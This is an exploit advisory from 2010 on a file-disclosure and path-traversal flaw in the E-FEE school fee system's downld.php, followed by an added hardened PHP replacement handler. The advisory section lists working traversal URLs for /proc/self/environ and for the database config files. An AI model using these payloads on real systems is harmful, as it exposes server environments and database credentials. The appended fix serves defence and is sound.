[webapps / 0day] - E-FEE Local File Disclosure (downld.php)
Posted on 16 December 2010
==============================================================
E-FEE Local File Disclosure (downld.php) + LFI Vulnerabilities
==============================================================

# Exploit Title : E-FEE (A Complete School/College Fee info. & Management System) Local File Disclosure (downld.php) + LFI
# web : http://www.kirantechnologies.com/projectdetails.html
# Date : 14 December 2010
# Author : Sudden_death
# Platform/Tested on: Windows XP Professional SP 2
# myweb : http://sudden.isgreat.org
======================================================================

LFI

http://127.0.0.1/downld.php?file1=../../../../../proc/self/environ
http://127.0.0.1/downld.php?file1=../../../../../../../proc/self/environ
http://127.0.0.1/downld.php?file1=../../../../../../../../../proc/self/environ
http://127.0.0.1/downld.php?file1=../../../../../../../../../../../proc/self/environ

[#]-------------------------------------------------------------------

File Disclosure

# Look at the source code of downld.php

..............
$filename=$_GET['file1']; // downloading a file use http://somewhere.com/download.php/?filename=name of file
.........................

# Let us download a file, e.g. "article_details.php", "staff_details1.php", "index.php admin path", etc.

[*] See the source of article_details.php

.........
include_once('db.inc'); <--- look here
session_start();
.........

[*] See the source of staff_details1.php

.........
error_reporting(E_ALL^E_NOTICE);
include("dbconn.inc.php"); <--- look here
.........

[*] See the source of the index.php admin path

.........
include("includes/dbconn.inc.php"); <--- look here
include("class.pager.php");
$p = new Pager;
if($_POST['chk_verify'])
.........

# vuln

http://127.0.0.1/downld.php?file1=db.inc
or
http://127.0.0.1/downld.php?file1=dbconn.inc.php
or
http://127.0.0.1/downld.php?file1=path_admin/includes/dbconn.inc.php

[#]-------------------------------------------------------------------

Greets :| bumble_be | kiddies | patriot | Mr.SoOofe | petimati | white hat | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0 d4rk fl00d3r | Ichito-Bandito | james0baster | kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic | cah_surip | angga | demnas | ELV1N4 | jonathan | virgi | wenkhairu | jos_ali_jo | scr34mz | Kimmonosz | pL4nkt0n | RxN7 | Jimmy | 45tr0_k1ll1n9 | huda_style | zalezero | CireSoft49 | r4tu_le64h | cruzen | ranggamagic | Mbah_semar | and all crew's |

Special thanks : [ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org | makassarhacker.com ]

[#]-------------------------------------------------------------------

note : Do not say everything you know, but know everything you say!

# 1337db.com [2010-12-16]
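
The excerpt above shows `downld.php` taking `$_GET['file1']` as the file name with no validation, which is why both the `../` paths and the bare `db.inc` / `dbconn.inc.php` names are served. The following hardened handler is an added example, not E-FEE's code and not part of the advisory; the `downloads` directory, the extension allowlist and the names `DOWNLOAD_DIR`, `ALLOWED_EXT` and `resolve_download()` are assumptions.

```php
<?php
// Added example: hardened replacement for the file1 handling in downld.php.
// DOWNLOAD_DIR, ALLOWED_EXT and resolve_download() are assumed names.
declare(strict_types=1);

const DOWNLOAD_DIR = __DIR__ . '/downloads';   // assumed: holds only downloadable documents
const ALLOWED_EXT  = ['pdf', 'doc', 'xls', 'jpg', 'png'];   // assumed allowlist

/** Map a requested name to a real file inside $baseDir, or null to refuse. */
function resolve_download($requested, string $baseDir = DOWNLOAD_DIR): ?string
{
    // Bare file names only: no separators, NUL bytes, quotes or leading dot,
    // so "../" sequences and "path_admin/includes/..." never reach the filesystem.
    if (!is_string($requested)
        || preg_match('/\A[A-Za-z0-9_-][A-Za-z0-9._-]*\z/', $requested) !== 1) {
        return null;
    }
    // Source and config files (db.inc, dbconn.inc.php) fail the extension check.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // The canonical path must still sit under the base directory (symlink check).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$path = resolve_download($_GET['file1'] ?? null);
if ($path === null) {
    http_response_code(404);   // same answer for "missing" and "refused"
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('X-Content-Type-Options: nosniff');
header('Content-Length: ' . filesize($path));
readfile($path);
```

Database credentials in files such as `db.inc` are also safer stored outside the web root, since a `.inc` file requested directly is typically served as plain text.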